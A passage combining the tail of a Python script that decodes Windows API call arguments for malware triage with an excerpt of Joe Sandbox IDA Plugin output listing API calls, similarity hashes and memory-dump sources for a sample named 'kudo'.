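    """Split one record into api, module, ref address and raw argument list."""
    m = _CALL_RE.search(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [_arg(a) for a in raw_args.split(",") if a.strip()]
    return {"api": api, "module": module, "ref": int(ref, 16), "args": args, "detail": {}}


def decode_call(line: str) -> Optional[Dict[str, Any]]:
    """parse_call plus symbolic names for the APIs whose arguments matter in triage."""
    call = parse_call(line)
    if call is None:
        return None
    a, d = call["args"], call["detail"]
    if call["api"] in ("CreateFileW", "CreateFileA") and len(a) >= 6:
        # (lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
        #  dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
        d["access"] = "?" if a[1] is None else _flags(a[1], ACCESS_FLAGS)
        d["share"] = "?" if a[2] is None else _flags(a[2], SHARE_FLAGS)
        d["disposition"] = "?" if a[4] is None else DISPOSITION.get(a[4], f"0x{a[4]:X}")
        d["attrs"] = "?" if a[5] is None else _flags(a[5], FILE_FLAGS)
    elif call["api"] in ("SHGetFolderPathW", "SHGetFolderPathA") and len(a) >= 2 and a[1] is not None:
        # (hwndOwner, nFolder, hToken, dwFlags, pszPath); extra stack slots are ignored
        folder = a[1] & 0xFF
        d["folder"] = CSIDL.get(folder, f"CSIDL_0x{folder:X}")
        d["create"] = bool(a[1] & CSIDL_FLAG_CREATE)
    return call


def decode_report(lines: List[str]) -> List[Dict[str, Any]]:
    """Decode every parseable call record, dropping lines without an argument list."""
    return [c for c in (decode_call(ln) for ln in lines) if c is not None]


def summarize(call: Dict[str, Any]) -> str:
    """One readable line per call: ref address, API, and any decoded arguments."""
    body = ", ".join(f"{k}={v}" for k, v in call["detail"].items())
    return f"{call['ref']:08X} {call['api']}({body})"


if __name__ == "__main__":
    for rec in decode_report(SAMPLE_LINES):
        print(summarize(rec))
```

Run stand-alone it prints one line per decoded record; feed it the whole APIs block of a report to get the same summary for every function. Unknown bits are kept as hex rather than dropped, so an unexpected flag (for example FILE_FLAG_DELETE_ON_CLOSE on a file the sample just wrote) stays visible instead of being silently folded into a known name.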
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: d8e51220039271e28a31830b12300b600ed264e50c91e3a89fcf853e1cc88185
                                                      • Instruction ID: 2f587354009fd6a86597dd8775a7d9b8eb21875c83af06fa72df5da6b6973483
                                                      • Opcode Fuzzy Hash: d8e51220039271e28a31830b12300b600ed264e50c91e3a89fcf853e1cc88185
                                                      • Instruction Fuzzy Hash: 5E01D471841A28EBCF22AF6CFC0249E7B61FF60321F404115B824DA291DB318AD1DF92
                                                      APIs
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      • __lock_file.LIBCMT ref: 008253EB
                                                        • Part of subcall function 00826C11: __lock.LIBCMT ref: 00826C34
                                                      • __fclose_nolock.LIBCMT ref: 008253F6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 3bf0983281281d552c35199543c9fff8153c642634289b77d306591568f5cfcb
                                                      • Instruction ID: 301afc50ae58fe0f4ea7fd90ebb5f5660d0cbab0d1be4bad3c2f68e1c7272ab4
                                                      • Opcode Fuzzy Hash: 3bf0983281281d552c35199543c9fff8153c642634289b77d306591568f5cfcb
                                                      • Instruction Fuzzy Hash: C3F09671842A24DADB10BB69B8057AD6AE0FF42374F209149E424EB2C1CBBC49C15B53
                                                      APIs
                                                      • InitializeCriticalSectionEx.KERNEL32(00000000,008BE6A8,00829A0E,?,00829D0B,00000000,00000FA0,00000000,008BA1A8,00000008,00829C22,00000000,00000000,?,00829A7C,0000000D), ref: 00829E44
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,008BE6A8,?,00829D0B,00000000,00000FA0,00000000,008BA1A8,00000008,00829C22,00000000,00000000,?,00829A7C,0000000D), ref: 00829E4E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalInitializeSection$CountSpin
                                                      • String ID:
                                                      • API String ID: 4156364057-0
                                                      • Opcode ID: 63ded00b99628c2d4a3f396ad559c5fbbf225cca08732e3bff3cc5eb7b2b332b
                                                      • Instruction ID: 221d09f306ae0280f13d5532de9159381b31e69d5149a6a2fdb7aed2b83f7c14
                                                      • Opcode Fuzzy Hash: 63ded00b99628c2d4a3f396ad559c5fbbf225cca08732e3bff3cc5eb7b2b332b
                                                      • Instruction Fuzzy Hash: 2AD0673605424CBFCF029F98EC048993BBAFB58615F458421F96D89130D772A5A1AB40
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8831a72de8d86e41362633fc93cb0f07fe20a570ad95bae48ed2698f5f64e9e9
                                                      • Instruction ID: 6926c410cc3c0290cbb2704d5992501013c5b7475d6d667b940c489e560e6b5a
                                                      • Opcode Fuzzy Hash: 8831a72de8d86e41362633fc93cb0f07fe20a570ad95bae48ed2698f5f64e9e9
                                                      • Instruction Fuzzy Hash: 2261A9B060060A9FCB60DF64C881AABB7E9FF04314F158479EA0ADB782D775ED40CB91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8980c89b4091832904d95fbd586e0128ec5264ac28510123c70b5d83d086d1f
                                                      • Instruction ID: 57d72ccc553e32830d02d74c94eb91ffa9eb3299a8eb753917e970fb55616878
                                                      • Opcode Fuzzy Hash: d8980c89b4091832904d95fbd586e0128ec5264ac28510123c70b5d83d086d1f
                                                      • Instruction Fuzzy Hash: 43518034600608AFCF14EB68CD91EAE77A6FF49314F158168F906EB392DA30ED50CB52
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000), ref: 00805B96
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: d0dd885ad862f64dc8ef7584e54264151b3fcf8cc7fdafb34434c2ac246c392b
                                                      • Instruction ID: 249fb9b3c8880597e23f5678499f20b78a2de945c3e4dc02ddd26385fd62f25f
                                                      • Opcode Fuzzy Hash: d0dd885ad862f64dc8ef7584e54264151b3fcf8cc7fdafb34434c2ac246c392b
                                                      • Instruction Fuzzy Hash: 9B313C31A00A09AFDB58DF6CC894A6EB7B5FF44320F148669D815D3750D770B990CFA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 537056d3ac10abb3d3186e3b3e5fd98cf57d0ce1dc88f04c4f4573ea4c3c194f
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 3131B2B0A001199BC718DF58E484A69FBA6FB59304B6487A5E80ACB356D731EEC1DFC0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: de558d64cadc12eb9668d530c187ba634ca9b8faf2f7e588be50808dacb973f2
                                                      • Instruction ID: 259339cb77e7a194745a6cb3d98b6f0c023eeabb034aac946c9077704bae0893
                                                      • Opcode Fuzzy Hash: de558d64cadc12eb9668d530c187ba634ca9b8faf2f7e588be50808dacb973f2
                                                      • Instruction Fuzzy Hash: 034108745043519FDB54DF18C848B1ABBE0FF45318F0988ACE9998B362C731E885CF92
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa6fb75bfa27ba871a899fb4bbbd618bfc57508f8ddd74478bb5295b2ddcb0dd
                                                      • Instruction ID: 7b3249fcdaad12a78d83b400b03332e5eda8476345d7b6611a36ad28c7a6ad5b
                                                      • Opcode Fuzzy Hash: aa6fb75bfa27ba871a899fb4bbbd618bfc57508f8ddd74478bb5295b2ddcb0dd
                                                      • Instruction Fuzzy Hash: AF216D314097519FD7225B78BC01AE77BA4EF43320B0647A6FCA48B4E2E3251E61DAA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 67413ffd93ba7a3bfc524b9f1f56ce5b36816e05730e61f46a06a162b5651933
                                                      • Instruction ID: 2d47d9f4aa95d747653fd4b07cc385e44ef87f4a88b560fde5745f1c6654a440
                                                      • Opcode Fuzzy Hash: 67413ffd93ba7a3bfc524b9f1f56ce5b36816e05730e61f46a06a162b5651933
                                                      • Instruction Fuzzy Hash: B82105B1910B19EBCB109F65FC806AE7FB8FF40310F21856AE485C6251EBB0D4D1DB96
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 39d6859fb0e678b0997da484c85274c68ec26ae6658c543fad9101bdddc6f02f
                                                      • Instruction ID: a8f0187cd4f64f4d227346d1ec432dbe3e14347c82fb7b24aba97ce4dac41919
                                                      • Opcode Fuzzy Hash: 39d6859fb0e678b0997da484c85274c68ec26ae6658c543fad9101bdddc6f02f
                                                      • Instruction Fuzzy Hash: CE117CB56007029FD768DF19D851D22B7F9FB89320B14C86EE55ACB7A1EB30E880CB40
                                                      APIs
                                                        • Part of subcall function 00804BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00804BEF
                                                        • Part of subcall function 0082525B: __wfsopen.LIBCMT ref: 00825266
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E0F
                                                        • Part of subcall function 00804B6A: FreeLibrary.KERNEL32(00000000), ref: 00804BA4
                                                        • Part of subcall function 00804C70: _memmove.LIBCMT ref: 00804CBA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: 8e69a5c9931b69c6bfe70a4266def9d4138c56410599e7ea153f0363e05f774b
                                                      • Instruction ID: 69cf53b5d1cc05ee9726c3e4af05183c9e43570cf4324225504d34515870ac9d
                                                      • Opcode Fuzzy Hash: 8e69a5c9931b69c6bfe70a4266def9d4138c56410599e7ea153f0363e05f774b
                                                      • Instruction Fuzzy Hash: A411C472680205ABCF14AFB8CC12F6D77A9FF84720F108829F741E71C1DA7599019B92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: a9b72352ba339cdc42a03a9181d1142546e13f766ed2701dfd58171ee8a0f499
                                                      • Instruction ID: 84257517050546a56bb768608ec95c2d792af2c4b51e766c02b823e5731295c5
                                                      • Opcode Fuzzy Hash: a9b72352ba339cdc42a03a9181d1142546e13f766ed2701dfd58171ee8a0f499
                                                      • Instruction Fuzzy Hash: 8221F0B4908305DFDB54DF64C844A1ABBE0FF88314F058968E98A97762D731E845CB92
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 00805C16
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: dc557700dd68e8bf02e01e818689163d79d836890a888b7f67fbe81c0239e586
                                                      • Instruction ID: 5820375178b5aae804215ef91b32406fe63a40723193b924430f2d02d067ce52
                                                      • Opcode Fuzzy Hash: dc557700dd68e8bf02e01e818689163d79d836890a888b7f67fbe81c0239e586
                                                      • Instruction Fuzzy Hash: 95112531200B049FE3708F19C890B63B7E8FB44764F10C92EE9AA86A91D7B0F844CF60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                                                      • Instruction ID: 3a17de9756a42a1e77940f954af0eac59457b971b8cdb1101218f2d6695f60ea
                                                      • Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                                                      • Instruction Fuzzy Hash: 97018FB9201A02AFC305EB2CD951D26FBA9FF8A3107148569E919C7742DB31EC21CBE1
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 008248A6
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: 64408703e84e43c72e42c8bb6b6899062e7233d0640ea51a53153e498f13376c
                                                      • Instruction ID: fbcce16b4b8b25456a43ab305e2fc234a68084a689bd3cc33f73c7bb90d33c1b
                                                      • Opcode Fuzzy Hash: 64408703e84e43c72e42c8bb6b6899062e7233d0640ea51a53153e498f13376c
                                                      • Instruction Fuzzy Hash: A7F0C831911629EBDF11AF78EC057EE36E0FF01325F155424F424D6291DB7889D1DB62
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E7E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: c6d7ad2e117291b041c698b4ece4e10fa3fab7f641502d477498095d96ef4374
                                                      • Instruction ID: ac88fc4117f58e9d3899e978eac00ee7044223a730c18f18bdf6ddba416eea3f
